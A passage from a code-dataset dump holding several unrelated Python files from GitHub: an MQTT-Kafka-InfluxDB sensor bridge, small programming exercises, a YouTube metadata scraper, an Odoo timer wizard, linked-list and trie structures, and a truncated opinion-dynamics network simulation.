(f\"dvpg/msa/tower/2/height/1000/sonic\", 0),\n (f\"dvpg/msa/tower/4/height/1000/sonic\", 0), (f\"dvpg/msa/tower/6/height/1000/sonic\", 0),\n (f\"dvpg/msa/tower/7/height/1000/sonic\", 0), (f\"dvpg/msa/tower/8/height/1000/sonic\", 0),\n (f\"dvpg/msa/tower/9/height/1000/sonic\", 0), (f\"dvpg/msa/tower/10/height/1000/sonic\", 0),\n (f\"dvpg/msa/tower/11/height/1000/sonic\", 0)]\n\n\n\n# Insert Logic To Check which Kafka Broker is up and then send the data to it\nkafka_broker=\"192.168.32.151\" # IP address\nkafka_port=\"9092\"\nkafkaInstance = KafkaUtils(broker = kafka_broker, port = kafka_port)\nkafka_topic=\"msaDataTower1Sonic\" ## Where Kafka wants to publish\n#kafkaInstance.createTopic(kafka_topic)\n\n\n\nclass SonicSensorData(NamedTuple):\n timestamp: str\n latitude: str\n longitude: str\n Altitude: float\n Tower: str\n sensorType: str\n measurement:str\n measurement_value_1: float\n measurement_value_2: float\n measurement_value_3: float\n measurement_value_4: float\n measurement_value_5: float\n\ndef parse_mqtt_message(payload):\n #print(\"Data payload is\", str(payload))\n res= json.loads(payload)\n time_stamp=res['time']\n\n location=res[\"location\"]\n latitude=location['lat']\n longitude=location['lon']\n altitude=location['alt']['value']\n tower=res['tower']\n sensorType=res['sensorType']\n reading=res['reading']\n if sensorType=='soil':\n measurement='12FebSonicKafka' ## Corresponds to Table Name\n measurement_value1=reading[0]['value']\n measurement_value2=reading[1]['value']\n measurement_value3=reading[2]['value']\n measurement_value4=reading[3]['value']\n measurement_value5=reading[4]['value']\n return SonicSensorData(time_stamp, latitude, longitude, altitude, tower, sensorType,measurement,measurement_value1,measurement_value2,measurement_value3,measurement_value4,measurement_value5)\n\n\ndef send_sensor_data_to_influx(sensor_data):\n if sensor_data.sensorType=='soil':\n json_body = [\n {\n 'measurement': sensor_data.measurement,\n 'tags': {\n 'latitude': sensor_data.latitude,\n 'longitude': sensor_data.longitude,\n 'Time_stamp': sensor_data.timestamp,\n 'tower': sensor_data.Tower,\n 'altitude': sensor_data.Altitude,\n 'sensorType': sensor_data.sensorType\n\n },\n 'fields': {\n 'measurement_value1': sensor_data.measurement_value_1,\n 'measurement_value2': sensor_data.measurement_value_2,\n 'measurement_value3': sensor_data.measurement_value_3,\n 'measurement_value4': sensor_data.measurement_value_4,\n 'measurement_value5': sensor_data.measurement_value_5\n\n }\n }\n ]\n write_api.write(BUCKET, ORG, json_body)\n #print(\"Data uploaded to InfluxDB\")\ndef on_message(client,userdata,message):\n\n msg_payload=str(message.payload)\n #print(\"Received MQTT message\", msg_payload)\n #data_to_send=message.payload.decode(\"utf-8\")\n\n\n kafkaInstance.sendData(topic_name=kafka_topic, data=message.payload)\n #print(\"Kafka Published: \", data_to_send)\n insertnflux(message.payload)\n\n\nKafka_running = True\nMQTT_running = False\n\ndef insertnflux(mqtt_data):\n global Kafka_running, MQTT_running\n #print(\"data is\", mqtt_data)\n print('Kafka_running:', Kafka_running, \" MQTT_running:\", MQTT_running)\n\n kafka_data = None\n\n if Kafka_running:\n kafka_data = kafkaInstance.receiveData(topic_name=kafka_topic)\n #print(kafka_data)\n\n if kafka_data:\n try:\n parsed_sensor_data = parse_mqtt_message(kafka_data.decode(\"utf-8\"))\n send_sensor_data_to_influx(parsed_sensor_data)\n except:\n print('exception in kafka')\n else:\n print(\"Kafka is None\")\n\n if MQTT_running and not Kafka_running:\n try:\n parsed_sensor_data = parse_mqtt_message(mqtt_data.decode(\"utf-8\"))\n send_sensor_data_to_influx(parsed_sensor_data)\n except:\n print('exception in mqtt parsing')\n\n# Python thread to read variables\nimport _thread\nimport time\nimport random\ndef update_global_state():\n global Kafka_running, MQTT_running\n i=0\n while i<20:\n # update the global variablee\n print('updating global varsiable:', i)\n Kafka_running = random.randint(0,1)\n MQTT_running = random.randint(0, 1)\n\n time.sleep(2)\n i+=1\n\n\ndef insertinfluxState():\n global Kafka_running, MQTT_running\n\n while true:\n time.sleep(2)\n\n_thread.start_new_thread(update_global_state,())\n#_thread.start_new_thread(insertinfluxState,())\n\nmqtt_client.subscribe(MQTT_TOPIC)\nmqtt_client.on_message=on_message\nmqtt_client.loop_forever()\n\n","repo_name":"raginigupta6/IoBT","sub_path":"Integrated-Kafka-MQTT/Bridge.py","file_name":"Bridge.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37866625406","text":"class SinhVien:\n def __init__(self,id,name,lop):\n self.id=id\n self.name=name\n self.lop=lop\n self.dcc=10\n def setDcc(self,s):\n cnt=10\n for i in s:\n if i=='m':\n cnt-=1\n elif i=='v': cnt-=2\n if cnt<0: cnt=0\n self.dcc=cnt\n def printf(self):\n print(self.id+\" \"+self.name+\" \"+self.lop+\" \"+str(self.dcc),end=' ')\n if self.dcc==0:\n print('KDDK')\n print()\n\n\nn=int(input())\na=[]\nd={}\nfor _ in range(n):\n id=input()\n name=input()\n lop=input()\n sv=SinhVien(id,name,lop)\n d[sv.id]=sv\n a.append(sv)\nfor _ in range(n):\n id,status=input().split()\n d[id].setDcc(status)\nfor i in a:\n i.printf()\n\n'''\n3\nB19DCCN999\nLe Cong Minh\nD19CQAT02-B\nB19DCCN998\nTran Truong Giang\nD19CQAT02-B\nB19DCCN997\nNguyen Tuan Anh\nD19CQCN04-B\nB19DCCN998 xxxmxmmvmx\nB19DCCN997 xmxmxxxvxx\nB19DCCN999 xvxmxmmvvm\n'''","repo_name":"Nauh24/Python_PTIT","sub_path":"PY04012-TÍNH ĐIỂM CHUYÊN CẦN.py","file_name":"PY04012-TÍNH ĐIỂM CHUYÊN CẦN.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74153090051","text":"\nimport sympy\n\ndef numberOfPrimeFactors(n):\n c=0\n for i in range(2,n):\n #print(sympy.isprime(i))\n if(sympy.isprime(i) and n%i==0):\n c=c+1\n return c\ndef isSpecialNumber(n,p):\n if(numberOfPrimeFactors(n)>=p):\n return True\n else:\n return False\nif __name__==\"__main__\":\n p=int(input())\n for _ in range(int(input())):\n if(isSpecialNumber(int(input()),p)):\n print(\"YES\")\n else:\n print(\"NO\")","repo_name":"sreevidyachintala/APSSDC-Python-Programming-june-2019","sub_path":"Packages/numerical.py","file_name":"numerical.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2097410263","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport json\nimport re\nfrom selenium import webdriver\nfrom webdriver_manager.firefox import GeckoDriverManager\nimport time\n\nVERSION = '0.1.0'\n\nRESPONSE = {\n 'id': str,\n 'title': str,\n 'upload_date': str,\n 'duration': str,\n 'description': str,\n 'genre': str,\n\n 'uploader': {\n 'channel_id': str,\n },\n 'statistics': {\n 'views': str,\n 'likes': int,\n },\n #'comments': str\n}\n\n\n\ndef make_soup(url):\n '''\n Reads the contents at the given URL and returns a Python object based on\n the structure of the contents (HTML).\n '''\n html = urlopen(url).read()\n return BeautifulSoup(html, 'lxml')\n\n\ndef scrape_data(id):\n '''\n Scrapes data from the YouTube video's page whose ID is passed in the URL,\n and returns a JSON object as a response.\n '''\n youtube_video_url = 'https://www.youtube.com/watch?v=' + id\n soup = make_soup(youtube_video_url)\n soup_itemprop = soup.find(id='watch7-content')\n if len(soup_itemprop.contents) > 1:\n video = RESPONSE\n uploader = video['uploader']\n statistics = video['statistics']\n video['id'] = id\n # get data from tags having `itemprop` attribute\n for tag in soup_itemprop.find_all(itemprop=True, recursive=False):\n key = tag['itemprop']\n if key == 'name':\n # get video's title\n video['title'] = tag['content']\n elif key == 'duration':\n # get video's duration\n video['duration'] = tag['content']\n elif key == 'datePublished':\n # get video's upload date\n video['upload_date'] = tag['content']\n elif key == 'genre':\n # get video's genre (category)\n video['genre'] = tag['content']\n elif key == 'thumbnailUrl':\n # get video thumbnail URL\n video['thumbnail_url'] = tag['href']\n elif key == 'interactionCount':\n # get video's views\n statistics['views'] = int(tag['content'])\n elif key == 'channelId':\n # get uploader's channel ID\n uploader['channel_id'] = tag['content']\n elif key == 'description':\n video['description'] = tag['content']\n elif key == 'playerType':\n video['playerType'] = tag['content']\n\n data = re.search(r\"var ytInitialData = ({.*?});\", soup.prettify()).group(1)\n data_json = json.loads(data)\n videoPrimaryInfoRenderer = data_json['contents']['twoColumnWatchNextResults']['results']['results']['contents'][0]['videoPrimaryInfoRenderer']\n likes=videoPrimaryInfoRenderer[\"videoActions\"]['menuRenderer'][\"topLevelButtons\"][0][\"segmentedLikeDislikeButtonRenderer\"][\"likeButton\"][\"toggleButtonRenderer\"]['defaultText'][\"simpleText\"]\n video['statistics']['likes'] = likes\n #video['comments']=ScrapComment(youtube_video_url)\n return RESPONSE\n\n return ({\n 'error': 'Video with the ID {} does not exist'.format(id)\n })\n\ndef ScrapComment(url):\n \"\"\" Scrapes comments from the YouTube video's page whose ID is passed in the URL,\n and returns a List as a response.\n \"\"\"\n option = webdriver.FirefoxOptions()\n option.add_argument(\"--headless\")\n driver = webdriver.Firefox(executable_path=GeckoDriverManager().install(), options=option)\n driver.get(url)\n prev_h = 0\n while True:\n height = driver.execute_script(\"\"\"\n function getActualHeight() {\n return Math.max(\n Math.max(document.body.scrollHeight, document.documentElement.scrollHeight),\n Math.max(document.body.offsetHeight, document.documentElement.offsetHeight),\n Math.max(document.body.clientHeight, document.documentElement.clientHeight)\n );\n }\n return getActualHeight();\n \"\"\")\n driver.execute_script(f\"window.scrollTo({prev_h},{prev_h + 200})\")\n # fix the time sleep value according to your network connection\n time.sleep(1)\n prev_h +=200 \n if prev_h >= height:\n break\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n driver.quit()\n comment_div = soup.select(\"#content #content-text\")\n comment_list = [x.text for x in comment_div]\n return(comment_list)\n","repo_name":"yosxos/Youtube-Scraper","sub_path":"scrapper_youtube.py","file_name":"scrapper_youtube.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9577428703","text":"\nfrom odoo import api, fields, models\n\n\nclass DoneTimer(models.TransientModel):\n _name = \"done.timer\"\n\n time = fields.Float(string=\"Time\")\n explication = fields.Char(string=\"Explication\")\n\n def update_lines(self):\n current_task = self.env['project.task'].browse(self._context.get('task_id'))\n self.env['account.analytic.line'].sudo().create({\n 'date': fields.Datetime.now(),\n 'employee_id': self.env.user.employee_id.id,\n 'name': self.explication,\n 'unit_amount': self.time,\n 'project_id': current_task.project_id.id,\n 'task_id': current_task.id,\n 'account_id': current_task.project_id.analytic_account_id.id\n })\n current_task.update({\n 'duration': 0\n })\n return True\n","repo_name":"BriceCG/timer","sub_path":"wizards/wizard_done_timer.py","file_name":"wizard_done_timer.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19258474911","text":"class Node:\n def __init__(self, value = None) -> None:\n self.value = value\n self.next = None\n self.prev = None\n\nclass DoublyLinkedList:\n def __init__(self) -> None:\n self.head = None\n self.tail = None\n\n def __iter__(self):\n node = self.head\n while node:\n yield node\n node = node.next\n\n # Create Doubly Linked List\n def createDLL(self, nodeValue): # Time Complexity -> O(1)\n node = Node(nodeValue)\n node.prev = None\n node.next = None\n self.head = node\n self.tail = node\n return \"The DLL is created successfully!\"\n\n # Insert a node (Start, Middle, End)\n def insertNode(self, nodeValue, location): # Time Complexity -> O(n)\n if self.head is None:\n print(\"The head referance is empty\")\n newNode = Node(nodeValue)\n # Insert at the start\n if location == 0:\n newNode.prev = None\n newNode.next = self.head\n self.head.prev = newNode\n self.head = newNode\n # Insert at the end\n elif location == 1:\n newNode.next = None\n newNode.prev = self.tail\n self.tail.next = newNode\n self.tail = newNode\n # Insert at any position\n else:\n tempNode = self.head\n index = 0\n while index < location - 1:\n tempNode = tempNode.next\n index += 1\n newNode.next = tempNode.next\n newNode.prev = tempNode\n newNode.next.prev = newNode\n tempNode.next = newNode\n\n # Travarse the Linked List\n def travarseLL(self): # Time Complexity -> O(n)\n if self.head is None:\n print(\"There is no elements in the list\")\n tempNode = self.head\n while tempNode:\n print(tempNode.value)\n tempNode = tempNode.next\n\n # Travarsal in reverse order\n def reverseTraverseLL(self): # Time Complexity -> O(n)\n if self.head is None:\n print(\"There is no element in the Linked List\")\n tempNode = self.tail\n while tempNode:\n print(tempNode.value)\n tempNode = tempNode.prev\n\n # Search in Doubly Linked List\n def searchLL(self, nodeValue): # Time Complexity -> O(n)\n if self.head is None:\n print(\"There is no element in the Linked List\")\n tempNode = self.head\n while tempNode:\n if tempNode.value == nodeValue:\n return tempNode.value\n tempNode = tempNode.next\n return \"The node doesn't exists in the list\"\n\n # Delete Node from DLL (Start, End, Middle)\n def deleteNode(self, location): # Time Complexity -> O(n)\n if self.head is None:\n print(\"There is no element in DLL\")\n # Delete from the start\n if location == 0:\n # When only 1 node in DLL\n if self.head == self.tail:\n self.head = None\n self.tail = None\n # More than 1 Node\n else:\n self.head = self.head.next\n self.head.prev = None\n # Delete from the end\n elif location == 1:\n # Only 1 node\n if self.head == self.tail:\n self.head = None\n self.tail = None\n # More than 1 node\n else:\n self.tail = self.tail.prev\n self.tail.next = None\n # Delete from any given location\n else:\n currNode = self.head\n index = 0\n while index < location - 1:\n currNode = currNode.next\n index += 1\n currNode.next = currNode.next.next\n currNode.next.prev = currNode\n print(\"The node has been successfully deleted\")\n\n # Delete the whole DLL\n def deleteList(self): # Time Complexity -> O(n)\n if self.head is None:\n print(\"There is no node in DLL\")\n tempNode = self.head\n while tempNode:\n tempNode.prev = None\n tempNode = tempNode.next\n self.head = None\n self.tail = None\n print(\"The DLL has been successfully deleted\")\n\n\nif __name__ == \"__main__\":\n ll = DoublyLinkedList()\n\n print(ll.createDLL(5))\n ll.insertNode(0,0)\n ll.insertNode(2,1)\n ll.insertNode(3,2)\n\n # ll.travarseLL()\n # ll.reverseTraverseLL()\n\n print([node.value for node in ll])\n\n # ll.deleteNode(-1)\n ll.deleteList()\n # print(ll.searchLL(7))\n\n print([node.value for node in ll])\n\n","repo_name":"Swaniket/Data-Structures-and-Algorithms-in-Python","sub_path":"04. Linked List/04_doublyLL.py","file_name":"04_doublyLL.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37627963050","text":"from __future__ import annotations\nfrom typing import Optional\nfrom ctci.utils.linked_lists import Node\n\n\ndef remove_dups(head: Node) -> Optional[Node]:\n \"\"\"Removes any duplicates from a linked list\n\n Args:\n head (Node): the beginning of a linked list\n\n Returns:\n Optional[Node]: returns the head of the linked list with duplicates removed\n \"\"\"\n\n # Set to see which values we have seen\n seen = set()\n\n # If the head is none, return none\n if head is None:\n return None\n\n # Loop through the elements and delete the node if we come across a value that has\n # already been seen\n cur_node: Optional[Node] = head\n prev: Optional[Node] = None\n while cur_node is not None:\n\n if cur_node.value in seen and prev is not None:\n prev.next = cur_node.next\n\n else:\n seen.add(cur_node.value)\n prev = cur_node\n\n cur_node = cur_node.next\n\n return head\n\n\ndef remove_dups_no_buffer(head: Node) -> Optional[Node]:\n \"\"\"Removes any duplicates from a linked list\n\n Args:\n head (Node): the beginning of a linked list\n\n Returns:\n Optional[Node]: returns the head of the linked list with duplicates removed\n \"\"\"\n\n # If the head is none, return none\n if head is None:\n return None\n\n # Implement two pointer approach\n first_pointer: Optional[Node] = head\n while first_pointer is not None:\n\n # Second pointer to start right after current pointer\n second_pointer: Optional[Node] = first_pointer.next\n prev: Optional[Node] = first_pointer\n\n # Go through the items after the first pointer and compare them with the second\n # pointer\n while second_pointer is not None and prev is not None:\n if first_pointer.value == second_pointer.value:\n prev.next = second_pointer.next\n else:\n prev = second_pointer\n\n second_pointer = second_pointer.next\n\n first_pointer = first_pointer.next\n\n return head\n","repo_name":"samkasbawala/ctci","sub_path":"ctci/linked_list/remove_dups.py","file_name":"remove_dups.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22179685962","text":"'''\n\n设计一个支持以下两种操作的数据结构:\n\nvoid addWord(word)\nbool search(word)\nsearch(word) 可以搜索文字或正则表达式字符串,字符串只包含字母 . 或 a-z 。 . 可以表示任何一个字母。\n\n��例:\n\naddWord(\"bad\")\naddWord(\"dad\")\naddWord(\"mad\")\nsearch(\"pad\") -> false\nsearch(\"bad\") -> true\nsearch(\".ad\") -> true\nsearch(\"b..\") -> true\n说明:\n\n你可以假设所有单词都是由小写字母 a-z 组成的。\n'''\n# 自己的版本\nclass WordDictionary:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.root = {}\n\n def addWord(self, word: str) -> None:\n \"\"\"\n Adds a word into the data structure.\n \"\"\"\n p = self.root\n for i in word:\n if i not in p:\n p[i] = {}\n p = p[i]\n p[\"end\"] = \"end\"\n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.\n \"\"\"\n flag = False\n p = self.root\n for i, w in enumerate(word):\n if w == \".\":\n for j in p:\n flag = self.search(word[:i] + j + word[i + 1:]) or flag\n return flag\n elif w not in p:\n return False\n p = p[w]\n if \"end\" in p:\n return True\n else:\n return False\n","repo_name":"huhudaya/leetcode-","sub_path":"LeetCode/211. 添加与搜索单词 - 数据结构设计.py","file_name":"211. 添加与搜索单词 - 数据结构设计.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"30280069427","text":"import numpy as np\n#from operator import itemgetter\n#import heapq\nimport random\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as col\n#from networkx.drawing.nx_agraph import graphviz_layout, to_agraph\nfrom copy import deepcopy\nimport seaborn as sns\nfrom statistics import stdev, mean\nimport imageio\nimport networkx as nx\nfrom scipy.stats import truncnorm\nimport os\n#from functools import reduce\nimport time\nimport community\n\ndef get_truncated_normal(mean=0, sd=1, low=0, upp=10):\n return truncnorm(\n (low - mean) / sd, (upp - mean) / sd, loc=mean, scale=sd)\n\n#Constants and Variables\n\nstates = [1, -1] #1 being cooperating, -1 being defecting\ndefectorUtility = -0.20 \npoliticalClimate= 0.20 \nselfWeight = 0.6\nd = 5 #degree\ns = 10\nk=3000 #10^6\ncontinuous = True\nskew = -0.05\nmypalette = [\"blue\",\"red\",\"green\", \"orange\", \"violet\", \"grey\", \"magenta\",\"cyan\", \"yellow\"]\nrandomness = 0.0625\n\nargs = {\"defectorUtility\" : defectorUtility, \n \"politicalClimate\" : politicalClimate, \n \"selfWeight\": selfWeight, \"d\":d, \n \"s\": s, \"k\" : k, \"continuous\" : continuous, \"type\" : \"cl\", \"skew\": skew}\n\ndef simulate(i, newArgs):\n setArgs(newArgs)\n global args\n start = time.time()\n X = get_truncated_normal(0.5, 0.15, 0, 1)\n S = get_truncated_normal(args[\"skew\"], 0.25, -1, 1)\n if(args[\"type\"] == \"cl\"):\n model =ClusteredPowerlawModel(144, args[\"d\"], skew=args[\"skew\"], X=X, S=S)\n elif(args[\"type\"] == \"sf\"):\n model = ScaleFreeModel(144, args[\"d\"], skew=args[\"skew\"], X=X, S=S)\n elif(args[\"type\"] == \"grid\"):\n model = GridModel(12, X=X, S=S)\n elif(args[\"type\"] == \"rand\"):\n model = RandomModel(144, args[\"d\"], skew=args[\"skew\"], X=X, S=S)\n else:\n model = RandomModel(144, args[\"d\"], X=X, S=S)\n simtime= time.time()\n #print(f'Time to make model: {simtime-start}s\\n')\n res = model.runSim(k, clusters=True)\n return model\n\n#Helper\ndef setArgs(newArgs):\n global args\n for arg, value in newArgs.items():\n args[arg] = value\n\n\ndef decision(probability):\n return random.random() < probability\n\n\ndef getRandomExpo():\n x = np.random.exponential(scale=0.6667)-1\n if(x>1): return 1\n elif (x< -1): return -1\n return x\n\nclass Agent:\n def __init__(self, state):\n self.state = state\n self.interactionsReceived = 0\n self.interactionsGiven = 0\n \n def consider(self, neighbour, neighboursWeight):\n self.interactionsReceived +=1\n neighbour.addInteractionGiven()\n weight = self.state*selfWeight + politicalClimate + defectorUtility + neighboursWeight*neighbour.state #+ random.uniform(-0.25, 0.25)\n #weight = politicalClimate + defectorUtility + neighboursWeight*neighbour.state #+ random.uniform(-0.25, 0.25)\n #print(\"neighbours weight: \", neighboursWeight, \" neighbours state: \", neighbour.state, \" weight: \", weight)\n if(continuous):\n #self.state = weight\n print(\"x: \", weight)\n p1 = (randomness+weight)*(1/(2*randomness))\n #print(p1)\n if(p1 <0): p1 = 0\n if(p1 > 1): p1=1\n print(\"Self.state: \",self.state, \", neighbour: \", neighbour.state,\", p1: \", p1)\n delta = (1/2)*(-self.state+1)*(p1) - ((1/2)*(self.state+1))*(1-p1)\n print(\"delta: \", delta)\n increment = 2*delta*abs(self.state-neighbour.state)\n print(\"increment: \", increment)\n print(\" \")\n self.state += increment\n #Truncate values \n if(self.state > 1):\n self.state = states[0]\n elif(self.state <-1):\n self.state = states[1] \n else:\n if(weight + random.uniform(-randomness, randomness) > 0):\n self.state = states[0]\n else:\n self.state = states[1] \n\n def addInteractionGiven(self):\n self.interactionsGiven +=1\n \n def groupConsider(self, neighbourList):\n return\n \n def groupConsiderA(self, neighbour, neighboursWeight, neighbourList, continuous=False):\n nbNeighbours = len(neighbourList)\n nbCoop = 0\n for n in neighbourList:\n if(n['agent'].state > 0): nbCoop += 1\n p = nbCoop/nbNeighbours\n self.interactionsReceived +=1\n neighbour.addInteractionGiven()\n if(neighbour.state <= 0):\n p=1-p\n \n weight = self.state*selfWeight + politicalClimate + defectorUtility + p*neighboursWeight*neighbour.state #+ random.uniform(-0.25, 0.25)\n \n if(continuous):\n self.state = weight\n if(weight > 1):\n self.state = states[0]\n elif(weight <-1):\n self.state = states[1] \n else:\n if(weight > 0):\n self.state = states[0]\n else:\n self.state = states[1] \n \n def groupConsiderB(self, impact, continuous = False):\n print(\"impact: \", impact, \"state: \", self.state)\n weight = self.state*selfWeight + politicalClimate + defectorUtility + impact #+ random.uniform(-0.25, 0.25)\n if(continuous):\n self.state = weight\n if(weight > 1):\n self.state = states[0]\n elif(weight <-1):\n self.state = states[1] \n else:\n if(weight >= 0):\n self.state = states[0]\n else:\n self.state = states[1] \n print(\"new state: \", self.state, \"\\n\")\n \n \n def setState(self, newState):\n if(newState >= states[1] and newState <= states[0]):\n self.state = newState\n else:\n print(\"Error state outside state range: \", newState)\n \n\nclass Model:\n def __init__(self, X = None, S=None):\n self.graph = nx.Graph()\n self.ratio = []\n self.states = []\n self.statesds = []\n self.defectorDefectingNeighsList = []\n self.cooperatorDefectingNeighsList = []\n self.defectorDefectingNeighsSTDList = []\n self.cooperatorDefectingNeighsSTDList =[]\n self.pos = []\n self.X = X\n self.S = S\n self.clusteravg = []\n self.clusterSD = []\n \n def interact(self):\n nodeIndex = random.randint(0, len(self.graph) - 1)\n node = self.graph.nodes[nodeIndex]['agent']\n neighbours = list(self.graph.adj[nodeIndex].keys())\n if(len(neighbours) == 0):\n return\n \n chosenNeighbourIndex = neighbours[random.randint(0, len(neighbours)-1)]\n chosenNeighbour = self.graph.nodes[chosenNeighbourIndex]['agent']\n weight = self.graph[nodeIndex][chosenNeighbourIndex]['weight']\n \n node.consider(chosenNeighbour, weight)\n \n def groupInteract(self):\n nodeIndex = random.randint(0, len(self.graph) - 1)\n node = self.graph.nodes[nodeIndex]['agent']\n \n neighbours = list(self.graph.adj[nodeIndex].keys())\n if(len(neighbours) == 0):\n return\n \n chosenNeighbourIndex = neighbours[random.randint(0, len(neighbours)-1)]\n chosenNeighbour = self.graph.nodes[chosenNeighbourIndex]['agent']\n \n weight = self.graph[nodeIndex][chosenNeighbourIndex]['weight']\n \n neighbourList = [self.graph.nodes[i] for i in neighbours]\n node.groupConsiderA(chosenNeighbour, weight, neighbourList)\n \n def groupInteractB(self):\n nodeIndex = random.randint(0, len(self.graph) - 1)\n node = self.graph.nodes[nodeIndex]['agent']\n print(\"Node: \", nodeIndex)\n neighbours = list(self.graph.adj[nodeIndex].keys())\n print(neighbours)\n if(len(neighbours) == 0):\n return\n \n impact = 0\n for n in neighbours:\n neighbour = self.graph.nodes[n]['agent']\n weight = self.graph[nodeIndex][n]['weight']\n impact += neighbour.state * weight\n \n impact = impact/len(neighbours)\n \n node.groupConsiderB(impact)\n \n def getAvgNumberOfDefectorNeigh(self):\n defectorFriendsList = []\n defectorNeighboursList = []\n for node in self.graph:\n agreeingNeighbours = 0\n neighbours = list(self.graph.adj[node])\n for neighbourIndex in neighbours:\n if self.graph.nodes[neighbourIndex]['agent'].state == self.graph.nodes[node]['agent'].state:\n agreeingNeighbours += 1\n if self.graph.nodes[node]['agent'].state== 1:\n defectorNeighboursList.append(agreeingNeighbours) #defectorNeighboursList.append(agreeingNeighbours/len(neighbours))\n else:\n defectorFriendsList.append(agreeingNeighbours)\n \n defectoravg = mean(defectorFriendsList)\n cooperatoravg =mean(defectorNeighboursList)\n defectorSTD = stdev(defectorFriendsList)\n cooperatorSTD =stdev(defectorNeighboursList)\n return(defectoravg, cooperatoravg, defectorSTD, cooperatorSTD)\n \n \n def countCooperatorRatio(self):\n count = 0\n for node in self.graph:\n if self.graph.nodes[node]['agent'].state > 0:\n count+=1\n return count/len(self.graph)\n\n def getAvgState(self):\n states = []\n for node in self.graph:\n states.append(self.graph.nodes[node]['agent'].state)\n statearray = np.array(states)\n avg = statearray.mean(axis=0)\n sd = statearray.std()\n return (avg, sd)\n\n def getFriendshipWeight(self):\n #weigth = random.uniform(0.1, 0.9)\n #global X\n weigth = self.X.rvs(1)\n return weigth[0]\n\n def getInitialState(self):\n global args\n if(args['continuous'] != True):\n state = states[random.randint(0,1)]\n else: \n # #state = random.uniform(-1, 1)s\n global S\n state = self.S.rvs(1)[0]\n #state= getRandomExpo()\n \n return state\n \n def runSim(self, k, groupInteract=False, drawModel = False, countNeighbours = False, gifname=None, clusters=False):\n self.partition = community.best_partition(self.graph)\n #modularity = community.modularity(self.partition, self.graph)\n #print(\"modularity of \", args[\"type\"], \" is \", modularity)\n\n if(drawModel):\n draw_model(self)\n \n filenames = []\n \n if(countNeighbours):\n (defectorDefectingNeighs,\n cooperatorDefectingFriends,\n defectorDefectingNeighsSTD,\n cooperatorDefectingFriendsSTD) = self.getAvgNumberOfDefectorNeigh()\n print(\"Defectors: avg: \", defectorDefectingNeighs, \" std: \", defectorDefectingNeighsSTD)\n print(\"Cooperators: avg: \", cooperatorDefectingFriends, \" std: \", cooperatorDefectingFriendsSTD)\n \n for i in range(k):\n if(groupInteract): self.groupInteractB()\n else:\n self.interact()\n ratio = self.countCooperatorRatio()\n self.ratio.append(ratio)\n (state, sd) = self.getAvgState()\n self.states.append(state)\n self.statesds.append(sd)\n \n #self.politicalClimate += (ratio-0.5)*0.001 #change the political climate depending on the ratio of cooperators\n if(clusters):\n (s, sds, size) = findAvgStateInClusters(self, self.partition)\n self.clusterSD.append(sds)\n\n if(countNeighbours):\n (defectorDefectingNeighs,\n cooperatorDefectingNeighs,\n defectorDefectingNeighsSTD,\n cooperatorDefectingNeighsSTD) = self.getAvgNumberOfDefectorNeigh()\n self.defectorDefectingNeighsList.append(defectorDefectingNeighs)\n self.cooperatorDefectingNeighsList.append(cooperatorDefectingNeighs)\n self.defectorDefectingNeighsSTDList.append(defectorDefectingNeighsSTD)\n self.cooperatorDefectingNeighsSTDList.append(cooperatorDefectingNeighsSTD)\n if(gifname != None and (i % 1 == 0)):\n draw_model(self, True, i)\n filenames.append(\"plot\" + str(i) +\".png\")\n \n #if(i % 10 == 0):\n #a = random.randint(0,n)\n #b = random.randint(0,n)\n #while(a==b):\n #b = random.randint(0,n)\n #weight = random.uniform(0.1, 0.9)\n #model.graph.add_edge(a, b, weight = weight)\n if(gifname != None):\n images = []\n for filename in filenames:\n images.append(imageio.imread(filename))\n #0.08167\n imageio.mimsave(\"network\" +gifname+ \".gif\", images, duration=0.08167)\n \n (avgs, sds, sizes) = findAvgStateInClusters(self, self.partition)\n self.clusteravg.append(avgs)\n \n if(countNeighbours):\n drawDefectingNeighbours(self.defectorDefectingNeighsList,\n self.cooperatorDefectingNeighsList,\n self.defectorDefectingNeighsSTDList,\n self.cooperatorDefectingNeighsSTDList, \n gifname)\n \n return self.ratio\n \n def populateModel(self, n, skew = 0):\n for n in range (n):\n agent1 = Agent(self.getInitialState())\n self.graph.nodes[n]['agent'] = agent1\n edges = self.graph.edges() \n for e in edges: \n weight=self.getFriendshipWeight()\n self.graph[e[0]][e[1]]['weight'] = weight\n global args\n if(skew != 0 and not args[\"continuous\"] ): \n num = round(abs(skew)*len(self.graph.nodes))\n indexes = random.sample(range(len(self.graph.nodes)), num)\n for i in indexes:\n self.graph.nodes[i]['agent'].state = states[1]\n #self.pos = nx.kamada_kawai_layout(self.graph)\n self.pos = nx.spring_layout(self.graph)\n\nclass GridModel(Model):\n def __init__(self, n, **kwargs):\n super().__init__(**kwargs)\n for i in range(n):\n for j in range (n):\n weight = self.getFriendshipWeight()\n agent1 = Agent(self.getInitialState())\n self.graph.add_node(i*n+j, agent=agent1, pos=(i, j))\n self.pos.append((i, j))\n if(i!=0):\n self.graph.add_edge(i*n+j, (i-1)*n+j, weight = weight)\n if(j!=0):\n self.graph.add_edge(i*n+j, i*n+j-1, weight = weight)\n \n\nclass ScaleFreeModel(Model):\n def 